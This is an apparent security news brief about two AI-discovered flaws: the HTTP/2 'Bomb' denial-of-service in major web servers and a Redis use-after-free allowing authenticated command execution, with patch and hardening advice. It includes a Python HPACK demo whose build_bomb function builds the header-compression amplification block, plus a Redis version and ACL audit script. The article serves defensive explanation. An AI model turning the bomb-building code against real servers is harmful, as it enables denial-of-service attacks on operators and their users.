The Bugs AI Found This Week: an HTTP/2 'Bomb' and a Two-Year-Old Redis RCE

Two vulnerabilities disclosed this cycle were found by AI tooling: HTTP/2 Bomb (CVE-2026-49975), a remote DoS that crashes NGINX, Apache, IIS, Envoy and Cloudflare Pingora in default config, and CVE-2026-23479, a two-year-old authenticated RCE in Redis.


Key Takeaways

  • HTTP/2 Bomb (CVE-2026-49975), reportedly discovered by OpenAI Codex, is a remote denial-of-service that can drive NGINX, Apache HTTPD, Microsoft IIS, Envoy and Cloudflare Pingora to exhaust memory in seconds from a single machine in their default HTTP/2 configuration.
  • CVE-2026-23479 is a use-after-free in Redis's blocking-client code that lets an authenticated user run OS commands; it was introduced in Redis 7.2.0, sat unnoticed for over two years until an autonomous AI bug-hunting tool surfaced it, and is fixed in 8.6.3.
  • Both flaws were found by AI tooling and both land in commodity infrastructure, so the operational takeaway is that AI-driven discovery is now producing real CVEs faster than patch cycles absorb them — making patch cadence, not detection, the bottleneck.

The 'AI finds the bugs' story has graduated from vendor demos to shipping CVEs in the infrastructure you actually run — a default-config denial-of-service across the five biggest web servers, and a two-year-old remote-code-execution flaw in one of the most deployed data stores.

SAN FRANCISCO, CALIFORNIA — Two vulnerabilities disclosed this cycle were discovered by AI tooling rather than human researchers, extending a trend The CyberSignal has tracked through its Project Glasswing and Mythos coverage. The first, dubbed HTTP/2 Bomb and tracked as CVE-2026-49975, is a remote denial-of-service that — per The Hacker News, BleepingComputer and the security firm Calif, which codenamed it — can crash major web servers including NGINX, Apache HTTPD, Microsoft IIS, Envoy and Cloudflare Pingora in their default HTTP/2 configurations, and was reportedly surfaced by OpenAI Codex. The second, CVE-2026-23479, is a use-after-free in Redis's blocking-client code that lets an authenticated user execute operating-system commands on the host; it was introduced in Redis 7.2.0, remained undetected for more than two years, and was found by an autonomous AI bug-hunting tool.

Taken together, the two disclosures make a single point that is operational rather than theoretical: the discovery side of AI is now generating genuine CVEs in commodity infrastructure, and the rate at which those flaws surface is beginning to outpace the cadence at which organizations patch.

Two AI-Discovered Flaws at a Glance
HTTP/2 Bomb: CVE-2026-49975, remote denial-of-service via HTTP/2 header-compression amplification
Affected servers: NGINX, Apache HTTPD, Microsoft IIS, Envoy, Cloudflare Pingora, in default HTTP/2 configuration
Reported impact: a single 100 Mbps machine drove Apache HTTPD and Envoy to allocate up to ~32 GB of memory in under 20 seconds
HTTP/2 Bomb fixes: NGINX 1.29.8+ (new max_headers directive, default 1000); Apache mod_http2 v2.0.41; IIS, Envoy and Cloudflare Pingora unpatched at time of reporting
Discovery: HTTP/2 Bomb reportedly found by OpenAI Codex; Redis flaw found by an autonomous AI bug-hunting tool
Redis flaw: CVE-2026-23479, use-after-free in the unblock-client flow enabling authenticated OS command execution
Redis versions: introduced in 7.2.0; present through 8.6.2; fixed in 8.6.3 (released in the May 5, 2026 advisory)
Redis severity: NVD CVSS v3.1 8.8; Redis CVSS v4.0 7.7

What Happened

HTTP/2 Bomb targets HPACK, the header-compression scheme built into HTTP/2. According to the technical write-up from Calif and reporting by The Hacker News and BleepingComputer, the attack chains two known techniques: a compression bomb and a Slowloris-style hold. On the compression side, a single byte on the wire expands into a full header allocation on the server, and that reference is repeated thousands of times within one request; on the hold side, the client keeps its flow-control window at zero so the server can never deliver the response and free that memory. The combined effect is dramatic: a single machine on a 100 Mbps connection was reported to push Apache HTTPD and Envoy to allocate as much as 32 GB of memory in under 20 seconds, rendering them unresponsive. The flaw is reachable in each server's default HTTP/2 configuration, and a Shodan analysis cited in the reporting counted more than 880,000 public-facing sites running an affected server with HTTP/2 enabled. OpenAI Codex reportedly found the issue by chaining the two behaviors together.

CVE-2026-23479 is a different shape of problem. Redis patched a use-after-free in its blocking-client code: the unblock-client flow fails to handle an error return when re-executing a blocked command, and if the blocked client is evicted while that flow is in progress, the server keeps using memory it has already freed. An authenticated attacker who can set up that sequence can turn it into remote code execution on the host. The flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5, 2026 fixes, meaning it sat unnoticed for more than two years before an autonomous AI security tool built to hunt bugs in large codebases surfaced it. NVD rates it 8.8 under CVSS v3.1, while Redis lists it at 7.7 under CVSS v4.0. Exploitation requires an authenticated session and the ability to issue blocking commands, and the fix is in Redis 8.6.3. The Redis advisory bundled CVE-2026-23479 with several other issues addressed in the same release.

The HTTP/2 Bomb Mechanism: One Byte In, Gigabytes Held

What makes HTTP/2 Bomb notable is the leverage. Header compression is a feature, not a bug — HPACK exists so that repetitive headers do not have to be re-sent in full on every request. The attack abuses that efficiency in reverse: because a compact reference on the wire expands into a full allocation in memory, an attacker can request enormous server-side memory commitments using very little bandwidth. Pairing that amplification with a flow-control hold that stops the server from reclaiming the memory turns a compression optimization into a resource-exhaustion primitive. The result is a remote DoS that works from a single host against servers in their out-of-the-box configuration. NGINX has shipped a fix in 1.29.8 and later that adds a max_headers directive defaulting to 1000, and Apache addressed it in mod_http2 v2.0.41; at the time of reporting, Microsoft IIS, Envoy and Cloudflare Pingora had no patch available.
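To make the leverage concrete, here is a minimal HPACK encoder and decoder written for this brief, not code from Calif's write-up or from any of the affected servers. It builds only the compression half of the pattern described above: one literal header with incremental indexing plants a large value in the HPACK dynamic table, and every subsequent one-byte indexed reference forces the decoder to materialise that value again. It also models a per-request header-count cap of the kind the article says NGINX added as max_headers, so you can see where such a limit trips. The header name x-a, the 4000-byte value and the repeat counts are assumptions chosen to fit the default 4096-byte dynamic table; Huffman strings, the static table and the flow-control hold are deliberately left out.

```python
# Minimal HPACK (RFC 7541) encoder/decoder for two representations only:
# "literal with incremental indexing" (plants a dynamic-table entry) and
# "indexed header field" (one byte that references it). Added example.

STATIC_TABLE_SIZE = 61       # RFC 7541 Appendix A defines 61 static entries
DYNAMIC_TABLE_SIZE = 4096    # default SETTINGS_HEADER_TABLE_SIZE
ENTRY_OVERHEAD = 32          # RFC 7541 s4.1: entry size = name + value + 32

class HeaderLimitExceeded(Exception):
    """A block decoded to more header fields than the configured cap."""

def encode_int(value, prefix_bits, flags=0):
    """RFC 7541 s5.1 integer with an N-bit prefix; `flags` sets the high
    bits of the first byte (0x80 indexed, 0x40 literal with indexing)."""
    mask = (1 << prefix_bits) - 1
    if value < mask:
        return bytes([flags | value])
    out = bytearray([flags | mask])
    value -= mask
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)

def decode_int(data, pos, prefix_bits):
    mask = (1 << prefix_bits) - 1
    value = data[pos] & mask
    pos += 1
    if value < mask:
        return value, pos
    shift = 0
    while True:
        b = data[pos]
        pos += 1
        value += (b & 0x7F) << shift
        shift += 7
        if not b & 0x80:
            return value, pos

def encode_string(s):                       # Huffman bit clear
    return encode_int(len(s), 7) + s

def decode_string(data, pos):
    if data[pos] & 0x80:
        raise ValueError("Huffman-coded strings are outside this demo")
    length, pos = decode_int(data, pos, 7)
    return bytes(data[pos:pos + length]), pos + length

def build_bomb(value_len, repeats, name=b"x-a"):
    """One literal that fits the default dynamic table, then `repeats`
    one-byte references to it (index 62 = first dynamic-table slot)."""
    if len(name) + value_len + ENTRY_OVERHEAD > DYNAMIC_TABLE_SIZE:
        raise ValueError("entry would not fit the default dynamic table")
    literal = bytes([0x40]) + encode_string(name) + encode_string(b"A" * value_len)
    return literal + encode_int(STATIC_TABLE_SIZE + 1, 7, 0x80) * repeats

def decode_block(block, max_headers=None):
    """Decode into (headers, decoded_bytes). `max_headers` models a
    per-request header-count cap like the max_headers directive above."""
    dynamic = []        # newest first: absolute index 62 is dynamic[0]
    headers = []
    decoded_bytes = 0
    pos = 0
    while pos < len(block):
        first = block[pos]
        if first & 0x80:                        # indexed header field
            idx, pos = decode_int(block, pos, 7)
            if idx <= STATIC_TABLE_SIZE:
                raise ValueError("static-table references not modelled")
            name, value = dynamic[idx - STATIC_TABLE_SIZE - 1]
        elif first & 0x40:                      # literal, incremental indexing
            idx, pos = decode_int(block, pos, 6)
            if idx != 0:
                raise ValueError("indexed names not modelled")
            name, pos = decode_string(block, pos)
            value, pos = decode_string(block, pos)
            dynamic.insert(0, (name, value))
        else:
            raise ValueError("other representations not modelled")
        headers.append((name, value))
        decoded_bytes += len(name) + len(value)
        if max_headers is not None and len(headers) > max_headers:
            raise HeaderLimitExceeded(f"more than {max_headers} header fields")
    return headers, decoded_bytes

def amplification(value_len, repeats):
    """(wire_bytes, decoded_bytes) for one bomb block."""
    block = build_bomb(value_len, repeats)
    _, decoded = decode_block(block)
    return len(block), decoded

def within_limit(block, max_headers):
    """True if the block decodes under the cap, False if the cap trips."""
    try:
        decode_block(block, max_headers)
        return True
    except HeaderLimitExceeded:
        return False
```

With a 4000-byte value and 1000 references, amplification(4000, 1000) returns 5008 bytes on the wire against 4,007,003 bytes decoded, roughly 800x, and within_limit(build_bomb(4000, 1000), 1000) is False because the cap trips on the 1001st field. decoded_bytes counts only name and value bytes, so that ratio is a floor: a real server also allocates per-field structures, and when the flow-control window never opens none of it is released, which is how modest bandwidth turns into the memory figures reported above.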

The Redis Flaw: A Two-Year Dwell Time in a Core Data Store

CVE-2026-23479 illustrates a different risk: not that AI finds new bugs, but that it finds old ones. The use-after-free lived in Redis from version 7.2.0 onward and survived more than two years of releases, code review and human scrutiny before an autonomous AI tool flagged it. That dwell time is the point. Redis is one of the most widely deployed in-memory data stores in the world, sitting behind caches, session stores, queues and rate limiters across the internet. A long-dormant authenticated RCE in that codebase is exactly the kind of latent flaw The CyberSignal has argued AI discovery will increasingly surface — a theme running through Anthropic's Project Glasswing milestone, in which its Mythos system surfaced more than 10,000 vulnerabilities in a month, and the program's expansion to roughly 150 critical-infrastructure organizations.

From Vendor Demos to Shipping CVEs

For most of the past year, AI-driven vulnerability discovery has been a story about capability — benchmarks, lab results, and vendor announcements. This cycle marks the shift from demonstration to deployment: two real CVEs, in software that a large share of the internet runs, both attributed to AI tooling. It follows Google's confirmation of the first AI-built zero-day used in the wild, and arrives alongside the scaled-back AI executive order built around sharing AI-found vulnerabilities with critical infrastructure. The discovery engine is now producing output at a pace that the patching side of the ecosystem was not built to absorb, which reframes the defender problem: the constraint is no longer finding the flaws, it is shipping and applying the fixes fast enough.

Scope and Impact

The scope of HTTP/2 Bomb is set by how ubiquitous the affected software is. NGINX, Apache HTTPD, Microsoft IIS, Envoy and Cloudflare Pingora collectively terminate a very large fraction of the web's HTTP/2 traffic — as reverse proxies, web servers, ingress controllers and CDN edge nodes. Because the flaw is reachable in default configurations and a Shodan scan cited in reporting counted more than 880,000 public-facing sites running an affected server with HTTP/2 on, the exposed surface is broad and largely passive: operators do not have to have done anything wrong to be vulnerable. The fact that several of the affected products had no patch at the time of reporting widens the window in which interim hardening, rather than a fixed build, is the only available control.

The Redis flaw has a narrower but still significant footprint. Exploitation requires an authenticated session and the ability to issue blocking commands, so it is not an unauthenticated internet-wide free-for-all. But Redis instances are frequently deployed with weak authentication or exposed beyond their intended network boundary, and any such instance shortens the path from foothold to OS command execution on the host. The two-year presence of the flaw across the 7.2.0-through-8.6.2 range means a large installed base has been carrying it, and upgrade lag in data-store infrastructure tends to be measured in quarters, not days.

Some specifics should be confirmed against the primary advisories before treating them as settled: whether all five named web servers will ultimately ship dedicated fixes and on what timeline (IIS, Envoy and Cloudflare Pingora were unpatched at reporting), the precise list of mitigating versions and configuration directives per server, and the full set of Redis versions and companion CVEs addressed in the May 5 release. The 32 GB-in-20-seconds figure for HTTP/2 Bomb is a reported lab result against specific servers and conditions; real-world impact will vary with deployment, resource limits and existing rate controls.

Response and Attribution

For platform, SRE and web-infrastructure teams, the HTTP/2 Bomb response is a discovery-and-hardening exercise. Identify every HTTP/2-terminating surface (load balancers, reverse proxies, ingress controllers and CDN edge) and track vendor advisories for the mitigating release or configuration. Where a fixed build exists, deploy it: NGINX 1.29.8+ with the max_headers directive, and Apache mod_http2 v2.0.41. Where a fix is not yet available, apply interim hardening at the edge: rate-limiting, per-connection stream, frame and header-count limits that cap how much a single connection can commit, and timeouts that close streams whose client stops reading the response, since the hold half of the attack depends on the client never opening its flow-control window. Because the attack is single-source and sub-minute, rehearse the DoS playbook with an emphasis on failover and automatic restart behavior; detection alone will not save an unprotected node that exhausts memory in 20 seconds.

For teams running Redis, upgrade to the patched 8.6.3 release. Where an immediate upgrade is not possible, tighten authentication and network exposure so that only trusted clients can reach the instance, withhold blocking commands from any ACL user that does not need them (exploitation requires the ability to issue them), and audit for Redis instances reachable beyond their intended network boundary. Authenticated RCE still requires a foothold, but an exposed or weakly authenticated cache is precisely the condition that turns this flaw from a contained risk into a host-takeover path. Treat Redis instances as the sensitive infrastructure they are rather than as disposable caches, and bring them into the same patch and exposure-review cadence as the rest of the estate.
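As an added triage aid for the Redis steps above, not Redis's own tooling: the script below reads the version out of INFO server output and checks it against the affected range the advisory gives (7.2.0 through 8.6.2, fixed in 8.6.3), then replays the command rules in ACL LIST lines to find users who can still issue any blocking command, the precondition the advisory attaches to exploitation. The INFO and ACL output is constructed sample data. The list of commands it treats as blocking, and the assumption that Redis's @blocking ACL category is the right thing to withhold, are mine; the advisory does not say which command triggers the bug.

```python
import re

# Affected range as the advisory reports it: introduced in 7.2.0,
# present through 8.6.2, fixed in 8.6.3. Added example, not Redis code.
AFFECTED_FROM = (7, 2, 0)
FIXED_IN = (8, 6, 3)

# Commands treated as blocking when granted individually. Assumed list
# (Redis's @blocking ACL category); the advisory names no command.
BLOCKING_COMMANDS = {
    "blpop", "brpop", "brpoplpush", "blmove", "blmpop",
    "bzpopmin", "bzpopmax", "bzmpop", "wait", "waitaof",
}

# Constructed sample output; not captured from a real server.
SAMPLE_INFO = """# Server
redis_version:8.6.2
redis_mode:standalone
os:Linux 6.1.0 x86_64
"""
SAMPLE_ACL = [
    "user default on nopass sanitize-payload ~* &* +@all",
    "user app on #<hash> sanitize-payload ~cache:* &* +@all -@blocking",
    "user worker on #<hash> ~queue:* &* -@all +@read +blpop",
    "user legacy off #<hash> ~* &* +@all",
]

def parse_version(info_text):
    """Pull redis_version out of INFO server output as an int tuple."""
    m = re.search(r"^redis_version:(\d+)\.(\d+)\.(\d+)", info_text, re.M)
    if not m:
        raise ValueError("redis_version not found in INFO output")
    return tuple(int(x) for x in m.groups())

def is_affected(version):
    """True for 7.2.0 <= version < 8.6.3."""
    return AFFECTED_FROM <= tuple(version) < FIXED_IN

def can_block(acl_line):
    """Replay one ACL LIST line's command rules left to right (later
    rules override earlier ones) and report whether any blocking
    command ends up permitted. Disabled ('off') users return False."""
    tokens = acl_line.split()
    if len(tokens) < 3 or tokens[0] != "user" or "off" in tokens[2:]:
        return False
    allowed = set()
    for tok in tokens[2:]:
        tok = tok.strip("()")            # Redis 7 selector groups
        if tok in ("+@all", "allcommands", "+@blocking"):
            allowed = set(BLOCKING_COMMANDS)
        elif tok in ("-@all", "nocommands", "-@blocking"):
            allowed = set()
        elif tok.startswith("+") and tok[1:] in BLOCKING_COMMANDS:
            allowed.add(tok[1:])
        elif tok.startswith("-") and tok[1:] in BLOCKING_COMMANDS:
            allowed.discard(tok[1:])
    return bool(allowed)

def triage(info_text, acl_lines):
    """Combine the version check with the ACL audit."""
    version = parse_version(info_text)
    blockers = [line.split()[1] for line in acl_lines if can_block(line)]
    return {
        "version": version,
        "affected": is_affected(version),
        "users_with_blocking": blockers,
        # Interim least-privilege step for accounts that do not need
        # blocking commands; the real fix is the upgrade to 8.6.3.
        "acl_fix": [f"ACL SETUSER {u} -@blocking" for u in blockers],
    }

if __name__ == "__main__":
    print(triage(SAMPLE_INFO, SAMPLE_ACL))
```

On the sample data the result flags the instance as affected (8.6.2) and names default and worker as users who can block: default because +@all grants everything, worker because +blpop is granted after -@all, while app has -@blocking applied last and legacy is switched off. Removing @blocking from a user breaks clients that rely on BLPOP, XREAD BLOCK or WAIT, so treat the suggested ACL SETUSER lines as a starting point for least-privilege accounts, not a blanket change.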

Neither flaw has been tied to in-the-wild exploitation in the reporting reviewed for this brief, and neither has an associated threat actor — these are discovery-and-disclosure stories, not active-campaign stories. The attribution that matters here is the discovery attribution: OpenAI Codex for HTTP/2 Bomb and an autonomous AI bug-hunting tool for the Redis flaw. The CyberSignal notes that the 'reportedly discovered by' framing reflects vendor and researcher accounts; the operational reality for defenders does not depend on who found the bug, only on how quickly the fix gets deployed.


The CyberSignal Analysis

Signal 01 — Discovery Has Outrun Remediation

The throughline of both disclosures is a timing inversion. For years the hard part of vulnerability management was finding the flaws; the assumption baked into most patch programs was that disclosures would arrive at a human pace. AI-driven discovery breaks that assumption by surfacing flaws — including long-dormant ones — faster than organizations can ship and apply fixes. The defender implication is to stop optimizing for detection and start optimizing for remediation velocity: shorter patch SLAs, automated rollout, and tested failover for the cases where a fix is not yet available. The bottleneck has moved, and programs built around the old bottleneck will fall behind.

Signal 02 — Default Configurations Are Now a Liability Surface

HTTP/2 Bomb is dangerous precisely because it works against software in its out-of-the-box state. That inverts a common mental model in which only misconfigured or exotic setups are at risk. When a flaw is reachable in the default configuration of the five most common web servers, the exposed population is enormous and entirely passive. The lesson is to treat default-config behavior as an active part of the threat model — to apply protective limits (header counts, frame and stream caps, memory ceilings) proactively rather than assuming the defaults are safe — especially for the affected products that had no vendor patch at disclosure.

Signal 03 — Old Code Is the New Attack Surface

The Redis flaw's two-year dwell time is the more unsettling of the two findings. It says that the latent risk in widely deployed dependencies is larger than anyone has measured, and that AI tooling will now convert that latent risk into disclosed CVEs on a compressed schedule. Every organization should assume its dependency surface contains long-buried flaws that AI will surface before long. The defensive response is unglamorous: maintain an accurate software bill of materials, keep core data-store and web-server software current, and treat 'it has been stable for years' as a statement about luck rather than safety.


Sources

Primary: Redis — Security advisory (CVE-2026-23479 and related)
Primary: Calif — Codex Discovered a Hidden HTTP/2 Bomb
Reporting: The Hacker News — New HTTP/2 Bomb Vulnerability Allows Remote DoS on NGINX, Apache, IIS, Envoy & Cloudflare
Reporting: BleepingComputer — New HTTP/2 Bomb DoS attack crashes web servers in under a minute
Reporting: The Hacker News — Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)
Related: The CyberSignal — Anthropic Expands Project Glasswing to ~150 Critical-Infrastructure Organizations
Related: The CyberSignal — Project Glasswing's Mythos Surfaced More Than 10,000 Vulnerabilities in a Month